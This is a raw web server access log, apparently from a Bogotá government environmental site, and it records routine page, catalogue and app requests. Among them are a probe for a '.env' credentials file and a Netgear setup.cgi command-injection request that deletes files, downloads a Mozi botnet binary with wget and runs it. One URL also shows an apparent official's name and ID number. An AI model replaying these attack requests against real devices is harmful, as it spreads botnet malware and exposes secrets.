172.22.2.4 - - [23/Apr/2022:10:28:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
181.54.16.17 - - [23/Apr/2022:10:30:05 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
181.54.16.17 - - [23/Apr/2022:10:30:05 -0500] "GET /catalogoisis/Css/Busqueda.css HTTP/1.1" 200 1995
181.54.16.17 - - [23/Apr/2022:10:30:05 -0500] "GET /catalogoisis/Js/AceptarLimpiar.js HTTP/1.1" 200 331
181.54.16.17 - - [23/Apr/2022:10:30:05 -0500] "GET /catalogoisis/Js/CriterioCombinada.js HTTP/1.1" 200 1843
181.54.16.17 - - [23/Apr/2022:10:30:05 -0500] "GET /catalogoisis/Js/LimpiarCombinada.js HTTP/1.1" 200 207
181.54.16.17 - - [23/Apr/2022:10:30:05 -0500] "GET /catalogoisis/Js/Cookies.js HTTP/1.1" 200 1369
181.54.16.17 - - [23/Apr/2022:10:30:05 -0500] "GET /catalogoisis/Js/Remote.js HTTP/1.1" 200 436
181.54.16.17 - - [23/Apr/2022:10:30:05 -0500] "GET /catalogoisis/Js/Numero.js HTTP/1.1" 200 398
181.54.16.17 - - [23/Apr/2022:10:30:05 -0500] "GET /catalogoisis/Js/Go.js HTTP/1.1" 200 364
181.54.16.17 - - [23/Apr/2022:10:30:05 -0500] "GET /catalogoisis/Js/Enter.js HTTP/1.1" 200 1208
181.54.16.17 - - [23/Apr/2022:10:30:05 -0500] "GET /catalogoisis/imagenes/br1c1.gif HTTP/1.1" 200 172
181.54.16.17 - - [23/Apr/2022:10:30:05 -0500] "GET /catalogoisis/imagenes/aceptar1.gif HTTP/1.1" 200 604
181.54.16.17 - - [23/Apr/2022:10:30:05 -0500] "GET /catalogoisis/imagenes/br1c3.gif HTTP/1.1" 200 302
181.54.16.17 - - [23/Apr/2022:10:30:05 -0500] "GET /catalogoisis/imagenes/limpiar1.gif HTTP/1.1" 200 606
181.54.16.17 - - [23/Apr/2022:10:30:05 -0500] "GET /catalogoisis/imagenes/Turnbo1.gif HTTP/1.1" 200 227
181.54.16.17 - - [23/Apr/2022:10:30:05 -0500] "GET /catalogoisis/imagenes/Header.gif HTTP/1.1" 200 30313
181.54.16.17 - - [23/Apr/2022:10:30:05 -0500] "GET /catalogoisis/imagenes/br3c1.gif HTTP/1.1" 200 177
181.54.16.17 - - [23/Apr/2022:10:30:05 -0500] "GET /catalogoisis/imagenes/br3c3.gif HTTP/1.1" 200 186
181.54.16.17 - - [23/Apr/2022:10:30:05 -0500] "GET /catalogoisis/imagenes/br3c2.gif HTTP/1.1" 200 285
181.54.16.17 - - [23/Apr/2022:10:30:05 -0500] "GET /catalogoisis/imagenes/br1c2.gif HTTP/1.1" 200 297
181.54.16.17 - - [23/Apr/2022:10:30:05 -0500] "GET /catalogoisis/imagenes/br2c1.gif HTTP/1.1" 200 297
181.54.16.17 - - [23/Apr/2022:10:30:05 -0500] "GET /catalogoisis/imagenes/br2c2.gif HTTP/1.1" 200 302
181.54.16.17 - - [23/Apr/2022:10:30:05 -0500] "GET /catalogoisis/imagenes/br2c3.gif HTTP/1.1" 200 416
181.54.16.17 - - [23/Apr/2022:10:30:05 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.154.243.236 - - [23/Apr/2022:10:30:07 -0500] "GET /si-eres-mujer-y-te-gusta-el-cuidado-de-los-humedales-este-proceso-de-formacion-es-para-ti.html HTTP/1.1" 200 1025
181.54.16.17 - - [23/Apr/2022:10:30:24 -0500] "GET /catalogoisis/imagenes/limpiar2.gif HTTP/1.1" 200 589
181.54.16.17 - - [23/Apr/2022:10:30:24 -0500] "GET /catalogoisis/imagenes/limpiar2.gif HTTP/1.1" 200 589
45.155.204.146 - - [23/Apr/2022:10:30:24 -0500] "GET / HTTP/1.1" 200 319
181.54.16.17 - - [23/Apr/2022:10:30:24 -0500] "GET /catalogoisis/imagenes/aceptar2.gif HTTP/1.1" 200 586
186.102.45.252 - - [23/Apr/2022:10:30:55 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+fTyGLl80Q5IQaALk6E8sqSZJJhUa0Kvz1Yw9olzEH7l/JJWqonDKfJwdZlVXotK0KG5kkhJI6Pg==&y=U2FsdGVkX1/drWhCoPiGN8wb+EWbucErTP723sz+ebeJjjxWEbsCBHnbQbA12jWj HTTP/1.1" 200 30
186.102.45.252 - - [23/Apr/2022:10:30:56 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+Y9EV32yWU9a3oycjSPf7F4yZMYlg2ZWH506PRuNKvl4rWJZerCqOuBrYmQXMeBrn0AUrGUNBXdNiOBsjdKsJDBJ35PBT3aPA=&u=U2FsdGVkX18/ky5uCrgwd7PMSkhTivaPSndEHD91jjOYZ+PZRov6CvS3D9/r7XzH&y=U2FsdGVkX1/drWhCoPiGN8wb+EWbucErTP723sz+ebeJjjxWEbsCBHnbQbA12jWj HTTP/1.1" 200 97
186.102.45.252 - - [23/Apr/2022:10:30:56 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/VHQdZ5y+8JllyMvNP4eJT/f/Zvmr51DWP25gtnrobPjzt7+fkvwzBvmZIhRjuHR8Hr3xXJ+p7hujEI1gg3t/6UsfKejEBpN760Gj9cbAjUEA1oDoXzgSdcwVJPXjR6ZcFpPqFvllChAZiHG5V1nemc7cfgYBb+NM/1KymIFp1Tle6yPtdKGK3wvD7DVkmEyczsK06FlGAlWsnMI2Buv3p9QEsEQ09khkvXP6yBjyeBWJdvc0eozyubRkTTbk9hMXrFRG8oDmanOHoNCHk/FMY/zmhgKxGZgEW8twLeMtkkwd/eXRMWjAhXpW3EzHvCFGwgjsRBhn3YMmJERCTBtCIwkuGKVgoR+LRReqSh+6TPJRuFO19YT99ito7n/0uwV3GE3y3htG8e/J/nSMjFkdlc+8qT8qSm0oyZBeY6ZCoEl5Xkvpaexl6LEMI0zc9Kn65BmAfwmE03CLfxVuvznpfrWmlgARGhs1DkATQ3VghnHvZhmL6HG/RudZ5aIPo6YDWqf+CeqZu/q5fttbqxpE/+xtlZF8Un1TlfUPq0VZE9TSzrPpXKrGvqx+BRZBGUKyYyKXKBpYxk5hD/DerEHWi9zBzhpwRY1kBXJnt+deakcvy8vMBj/mg/IE1t6q2lcUIWXvVDxYIA9z3mg//nJgRfJ9CteiAuCHCR7az75Jl7qSEcCf9Fz15zrP45/EOFmie0eyr/5wn0yCgJK/l/R8w8zmDVa11t42aREzJiNzbJwBJQeaZlUKXuzCJGUA9MvV4ObqA79hI2f+QbtHanywtwPXQHv3lrA2zFjP6975Fq/QVVnpEwlyTH7Sg20p0bz3CtPlxgd/cjWBTfIJeTxa01PsehxE2Yg+9unjM5eEolJnGEH+JwFy+c3ApZQ6QN2qPq5HWR3v13Xfc9Qvm8wCvtCBtry9vG3SlVL8aGZJiAU0g1Iqymu6ylc7bg6yZR14ZDcbjknJLAVo/P6Cr3l9izGg/G7X/OeACg3LGnP0wIfxxfOmFptuyxLQftRgGnAkJxiPyBUFK9js7CTTI97+Clmpaq7adNXr6oTtQ604lzOvo8XN8SJ4xY7eCdAfPMKluKm6sp9phjpNSiACSFazALAhmiWq+4OixiI4W35kQrDhfgTbO6KIePb8joWxrlCcubkuNxjb4S6FQl4DNgqhc+LJ5wA2xCXdTgZkU4qpx+uEVKsfB9mrGYnbVfV3NMcT1CAdl2CEh27I8CicvHAfTP1Cn+uEjhzQAg/1cEvmdw4/Q+bB8zI/nIY5i9KSFcsf+a4FWQIf50S49/1g5lxtXrqzyrLTofaG7vVKHFqBZ9tD5qig087fGRSSlvjFUDGkoUa1FyeYudGJcKS7p6r+WIbAG31Dz8Nc=&u=U2FsdGVkX18/ky5uCrgwd7PMSkhTivaPSndEHD91jjOYZ+PZRov6CvS3D9/r7XzH&y=U2FsdGVkX1/drWhCoPiGN8wb+EWbucErTP723sz+ebeJjjxWEbsCBHnbQbA12jWj HTTP/1.1" 200 3186
186.102.45.252 - - [23/Apr/2022:10:30:56 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/Lhc65R29s9KIeI0q8RCUD7IPqeoms7fm/mwyrCofMzFrKKRatCw5J1yL18yr/mQuR45YjgzXdIKuASKzG90/2iahAbogsPZbewqffEWeU4ftMvGqWPM77wwcx33ZX3Epb/9UslwbG5XAz1qstHOdcbxXA/bs1IdnyIuU0RRa5SPBFvwb/Jg1JFuG+4F+rs4GcIYcD18+XrI2Jw98FtSRmeTYN0WDANhqZ+66AX0SEwCE5Fw0TNtTcmeZZybclMsPskH7eHPU4rAhRAb9FkaFw3TLQuZpTXZI=&u=U2FsdGVkX18/ky5uCrgwd7PMSkhTivaPSndEHD91jjOYZ+PZRov6CvS3D9/r7XzH&y=U2FsdGVkX1/drWhCoPiGN8wb+EWbucErTP723sz+ebeJjjxWEbsCBHnbQbA12jWj HTTP/1.1" 200 176
186.102.45.252 - - [23/Apr/2022:10:30:56 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1+fTyGLl80Q5IQaALk6E8sqSZJJhUa0Kvz1Yw9olzEH7l/JJWqonDKfJwdZlVXotK0KG5kkhJI6Pg== HTTP/1.1" 200 30975
216.245.221.92 - - [23/Apr/2022:10:32:53 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Apr/2022:10:32:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41897
181.54.16.17 - - [23/Apr/2022:10:33:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2418.pdf HTTP/1.1" 200 249141
186.155.204.215 - - [23/Apr/2022:10:33:36 -0500] "GET /secretaria-de-ambiente-libero-a-33-animales-silvestres-en-el-humedal-la-conejera.html HTTP/1.1" 200 1095
201.245.192.253 - - [23/Apr/2022:10:32:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46110
42.236.10.74 - - [23/Apr/2022:10:33:53 -0500] "GET / HTTP/1.1" 200 319
207.46.13.115 - - [23/Apr/2022:10:34:39 -0500] "GET /bla/resoluciones/autos%202021/5045.pdf HTTP/1.1" 200 361686
172.22.2.4 - - [23/Apr/2022:10:33:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.27.177.120 - - [23/Apr/2022:10:35:10 -0500] "GET /secretaria-de-ambiente-libero-a-33-animales-silvestres-en-el-humedal-la-conejera.html HTTP/1.1" 200 1095
40.88.21.235 - - [23/Apr/2022:10:35:13 -0500] "GET / HTTP/1.1" 200 319
40.88.21.235 - - [23/Apr/2022:10:35:13 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [23/Apr/2022:10:34:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
13.72.87.229 - - [23/Apr/2022:10:36:12 -0500] "GET /.env HTTP/1.1" 404 1018
13.72.87.229 - - [23/Apr/2022:10:36:12 -0500] "POST / HTTP/1.1" 200 319
212.94.26.41 - - [23/Apr/2022:10:37:18 -0500] "HEAD /secretaria-de-ambiente-libero-a-33-animales-silvestres-en-el-humedal-la-conejera.html HTTP/1.1" 200 -
186.102.42.164 - - [23/Apr/2022:10:37:34 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+cdHk/p4156ZjC0MrYQpx3pUcLUtfaxkd5oqEdUfU6OmOvd6J6sv4fS9yCUtcI4kbwTjY9byFz2wbKT4MN0+EiB/7UcHtuAB0gBgatpTEo+fzFZGKuoyEeyUCCio/DldpDiPg/aMnDWZd7X3VHRNsuIdbX1eoeH3wBrIVQMuzXdRSDkQpGpnZNa0FIe6yioL7mbqyZW9EVqleXCCaAt3yUJ9LDqQt7AZ1363CvE9YqQnrtLPRfXBH23LOIEjYOauj8kzrK0M9Q9Q==&u=U2FsdGVkX18MOeYx2DtnayiGhlch9TUv+SCubnDAMtcoWIp2TbKoabbTjXIZcJ40&y=U2FsdGVkX1+mhkP3UynsxOokc2HoTXIRdQv+xhF0nrNQVnIekSEGi8IzZ91jiuAm HTTP/1.1" 200 25
186.102.42.164 - - [23/Apr/2022:10:37:35 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX18MOeYx2DtnayiGhlch9TUv+SCubnDAMtcoWIp2TbKoabbTjXIZcJ40&y=U2FsdGVkX1+mhkP3UynsxOokc2HoTXIRdQv+xhF0nrNQVnIekSEGi8IzZ91jiuAm HTTP/1.1" 200 25
186.102.42.164 - - [23/Apr/2022:10:37:35 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX193GGXifV6nEvk8ByJNStyS4UGzQXomFVzZmaYQ9DJfxinK0xwba5yKu5clbyZIdYM1wfYzx39Q0iI4wMDeDCeMw0ykNt6fC1t0KetIl6gwk8fEwiQBtHhM4hem9rFLFYA3W4YUfEbA3x/vuGls7ArMn77ToTI4sz4=&u=U2FsdGVkX18MOeYx2DtnayiGhlch9TUv+SCubnDAMtcoWIp2TbKoabbTjXIZcJ40&y=U2FsdGVkX1+mhkP3UynsxOokc2HoTXIRdQv+xhF0nrNQVnIekSEGi8IzZ91jiuAm HTTP/1.1" 200 25
186.102.42.164 - - [23/Apr/2022:10:37:35 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19US45oRBMLkjm2O1LCGdahBCPrlxUofTNm9KFzAvmnP22yQv2k7m1CYq7955YUlAos7n3yRvl/99S87yH4wVL+D75dkTLbgrqE9pHjvldAmm/ArxwABwHfcOFjaW+nX16wlpIYAn53tH3foBcrD6G9wq8M+BIwf8Y=&u=U2FsdGVkX18MOeYx2DtnayiGhlch9TUv+SCubnDAMtcoWIp2TbKoabbTjXIZcJ40&y=U2FsdGVkX1+mhkP3UynsxOokc2HoTXIRdQv+xhF0nrNQVnIekSEGi8IzZ91jiuAm HTTP/1.1" 200 25
186.102.42.164 - - [23/Apr/2022:10:37:35 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+SiOEiEZOu/vUBoTSG8sSgxcOzpJbBncnqkV5FbmY5fRda1DJEZe9XNdgsN5AqMbUX0gjVaWYrA2QnZFuACmLi/v/nmzRjNjzX6BkMb+FRdCvpcgbqZ/gR5haJWB0bDJAuYNBef1NZJGvpQBTHN6CrcX6PMb5A87s=&u=U2FsdGVkX18MOeYx2DtnayiGhlch9TUv+SCubnDAMtcoWIp2TbKoabbTjXIZcJ40&y=U2FsdGVkX1+mhkP3UynsxOokc2HoTXIRdQv+xhF0nrNQVnIekSEGi8IzZ91jiuAm HTTP/1.1" 200 25
186.102.42.164 - - [23/Apr/2022:10:37:36 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18pkuKXVl96y4Xlptd6r277W1EKmuxWCO1nQMZ6lmBw8QoehtwmcPXFJ/yguUnRf5OEgCO1BV8pYmh+9b6hQy6qHoeZsmmbXsi9CjF9hx4LcM7OTcVf67Cw3GHXKHzRscBByojcxu+3I7MwgIrlFLoB6gZylhsOEXHdEJLwZQYHISrPMf38fac0OU3NRySW1ZTuCFSiKW3VMw==&u=U2FsdGVkX18MOeYx2DtnayiGhlch9TUv+SCubnDAMtcoWIp2TbKoabbTjXIZcJ40&y=U2FsdGVkX1+mhkP3UynsxOokc2HoTXIRdQv+xhF0nrNQVnIekSEGi8IzZ91jiuAm HTTP/1.1" 200 25
216.245.221.92 - - [23/Apr/2022:10:37:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [23/Apr/2022:10:37:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
172.22.2.4 - - [23/Apr/2022:10:37:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
172.22.2.4 - - [23/Apr/2022:10:39:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [23/Apr/2022:10:39:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
173.252.107.15 - - [23/Apr/2022:10:41:41 -0500] "GET /secretaria-de-ambiente-libero-a-33-animales-silvestres-en-el-humedal-la-conejera.html HTTP/1.1" 206 1095
173.252.107.13 - - [23/Apr/2022:10:41:44 -0500] "HEAD /secretaria-de-ambiente-libero-a-33-animales-silvestres-en-el-humedal-la-conejera.html HTTP/1.1" 206 -
31.13.103.120 - - [23/Apr/2022:10:41:48 -0500] "GET /secretaria-de-ambiente-libero-a-33-animales-silvestres-en-el-humedal-la-conejera.html HTTP/1.1" 206 1095
173.252.107.17 - - [23/Apr/2022:10:41:49 -0500] "GET /secretaria-de-ambiente-libero-a-33-animales-silvestres-en-el-humedal-la-conejera.html HTTP/1.1" 206 1095
173.252.107.18 - - [23/Apr/2022:10:41:51 -0500] "GET /secretaria-de-ambiente-libero-a-33-animales-silvestres-en-el-humedal-la-conejera.html HTTP/1.1" 206 1095
173.252.107.18 - - [23/Apr/2022:10:41:52 -0500] "GET /images/liberacion-fauna-silvestre-23-abril.jpg HTTP/1.1" 200 52551
69.171.251.6 - - [23/Apr/2022:10:41:59 -0500] "GET /secretaria-de-ambiente-libero-a-33-animales-silvestres-en-el-humedal-la-conejera.html?fbclid=IwAR1p66niBR7rDFf7uk-rXGA_4wPHNbTUygmZXMh7Dzkv5l6EHcq2gpmYe4M HTTP/1.1" 200 1095
69.171.251.10 - - [23/Apr/2022:10:42:00 -0500] "GET /secretaria-de-ambiente-libero-a-33-animales-silvestres-en-el-humedal-la-conejera.html?fbclid=IwAR2ir67f5Bv8b-QM0EGRv48CxgdFphbYej6Ll7GeKbnJ5ZEZ-A6-3H9jjmA HTTP/1.1" 200 1095
31.13.115.118 - - [23/Apr/2022:10:42:03 -0500] "GET /secretaria-de-ambiente-libero-a-33-animales-silvestres-en-el-humedal-la-conejera.html?fbclid=IwAR15Socd_DqS19dqyLL0Fucql7G1AThitNaDSUean6AuNWBTgLIViyycutM HTTP/1.1" 200 1095
66.249.65.13 - - [23/Apr/2022:10:42:33 -0500] "-" 408 -
69.171.249.116 - - [23/Apr/2022:10:42:36 -0500] "GET /secretaria-de-ambiente-libero-a-33-animales-silvestres-en-el-humedal-la-conejera.html HTTP/1.1" 200 1095
31.13.103.117 - - [23/Apr/2022:10:42:38 -0500] "GET /secretaria-de-ambiente-libero-a-33-animales-silvestres-en-el-humedal-la-conejera.html HTTP/1.1" 200 1095
69.63.184.3 - - [23/Apr/2022:10:42:39 -0500] "GET /secretaria-de-ambiente-libero-a-33-animales-silvestres-en-el-humedal-la-conejera.html HTTP/1.1" 200 1095
216.245.221.92 - - [23/Apr/2022:10:42:53 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Apr/2022:10:42:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41897
207.46.13.82 - - [23/Apr/2022:10:43:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/0116.pdf HTTP/1.1" 304 -
191.95.52.53 - - [23/Apr/2022:10:43:24 -0500] "GET /distrito-academia-y-sector-privado-plantaron-100-arboles-para-conmemorar-el-dia-de-la-tierra.html HTTP/1.1" 200 1066
40.77.167.29 - - [23/Apr/2022:10:43:47 -0500] "GET /Publicaciones/2022EE30164.pdf HTTP/1.1" 404 227
201.245.192.253 - - [23/Apr/2022:10:42:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46110
65.154.226.168 - - [23/Apr/2022:10:43:58 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
65.154.226.168 - - [23/Apr/2022:10:43:58 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
65.154.226.168 - - [23/Apr/2022:10:43:58 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
173.252.111.12 - - [23/Apr/2022:10:44:13 -0500] "GET /en-semana-santa-jardin-botanico-una-opcion-vital-para-reconectarse-y-vivir-la-naturaleza.html HTTP/1.1" 206 1012
69.63.189.4 - - [23/Apr/2022:10:44:17 -0500] "GET /images/zapatos-negocios-8-abril.jpg HTTP/1.1" 200 25964
181.61.150.209 - - [23/Apr/2022:10:45:03 -0500] "GET /forest/?msclkid=03546fbac31c11ec9b169c2846f8b00a HTTP/1.1" 200 12041
181.61.150.209 - - [23/Apr/2022:10:45:20 -0500] "POST /forest/index.php HTTP/1.1" 200 12268
69.171.251.16 - - [23/Apr/2022:10:46:09 -0500] "GET /secretaria-de-ambiente-libero-a-33-animales-silvestres-en-el-humedal-la-conejera.html?fbclid=IwAR1REC3Sd6i9RmHO0PFw1ZL-3GCZQv5rome885aRcT9RiY1CGHK8Jv4u-ek HTTP/1.1" 200 1095
172.22.2.4 - - [23/Apr/2022:10:44:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.131.225.90 - - [23/Apr/2022:10:46:46 -0500] "GET /secretaria-de-ambiente-libero-a-33-animales-silvestres-en-el-humedal-la-conejera.html HTTP/1.1" 200 1095
172.22.2.4 - - [23/Apr/2022:10:45:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
216.245.221.92 - - [23/Apr/2022:10:47:54 -0500] "HEAD / HTTP/1.1" 200 -
31.13.115.2 - - [23/Apr/2022:10:48:36 -0500] "GET /secretaria-de-ambiente-libero-a-33-animales-silvestres-en-el-humedal-la-conejera.html?fbclid=IwAR0Ic495_Q0i12Gv6QH6nMcFYZvQPeGCme0m0M_3ljhOg4022KEkXn9RFFI HTTP/1.1" 200 1095
190.131.225.90 - - [23/Apr/2022:10:49:19 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1030
172.22.2.4 - - [23/Apr/2022:10:49:42 -0500] "GET /BLA/boletinlegal/doctrina.php HTTP/1.1" 200 5604
184.105.139.68 - - [23/Apr/2022:10:50:39 -0500] "GET / HTTP/1.1" 200 319
186.170.222.200 - - [23/Apr/2022:10:51:01 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
186.170.222.200 - - [23/Apr/2022:10:51:02 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
186.170.222.200 - - [23/Apr/2022:10:51:02 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
186.170.222.200 - - [23/Apr/2022:10:51:02 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
186.170.222.200 - - [23/Apr/2022:10:51:02 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
186.170.222.200 - - [23/Apr/2022:10:51:02 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.170.222.200 - - [23/Apr/2022:10:51:08 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
186.170.222.200 - - [23/Apr/2022:10:51:11 -0500] "POST /appsia/controlador HTTP/1.1" 200 7793
186.170.222.200 - - [23/Apr/2022:10:51:15 -0500] "POST /appsia/controlador HTTP/1.1" 200 5252
186.170.222.200 - - [23/Apr/2022:10:51:26 -0500] "GET /appsia/controlador?comando=regresar&id=19401695&funcionario=GABRIEL+ARTURO+CARDENAS+SANABRIA&desde=19401695&hasta=19401695&version=19401695 HTTP/1.1" 200 7793
186.170.222.200 - - [23/Apr/2022:10:51:41 -0500] "POST /appsia/controlador HTTP/1.1" 200 6658
186.170.222.200 - - [23/Apr/2022:10:51:42 -0500] "POST /appsia/controlador HTTP/1.1" 200 11320
172.22.2.4 - - [23/Apr/2022:10:50:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.107.12 - - [23/Apr/2022:10:52:33 -0500] "GET /images/operativos-control-residuos-hospitalarios-4-abril.jpeg HTTP/1.1" 200 58998
58.255.203.150 - - [23/Apr/2022:10:52:47 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 1019
216.245.221.92 - - [23/Apr/2022:10:52:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [23/Apr/2022:10:51:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
157.55.39.211 - - [23/Apr/2022:10:53:10 -0500] "GET /portaldeninos/parque-mirador-de-los-nevados/ HTTP/1.1" 200 89788
199.16.157.181 - - [23/Apr/2022:10:53:21 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1030
173.252.111.3 - - [23/Apr/2022:10:53:28 -0500] "GET /feria-de-servicios-ambientales-viernes-1-y-sabado-2-de-abril-en-la-localidad-de-teusaquillo.html HTTP/1.1" 206 1027
173.252.111.24 - - [23/Apr/2022:10:53:34 -0500] "GET /se-acerca-jornada-de-reciclaton-de-residuos-especiales-peligrosos-y-aprovechables-en-teusaquillo.html HTTP/1.1" 206 1002
199.59.150.180 - - [23/Apr/2022:10:54:18 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1030
199.59.150.180 - - [23/Apr/2022:10:54:18 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1030
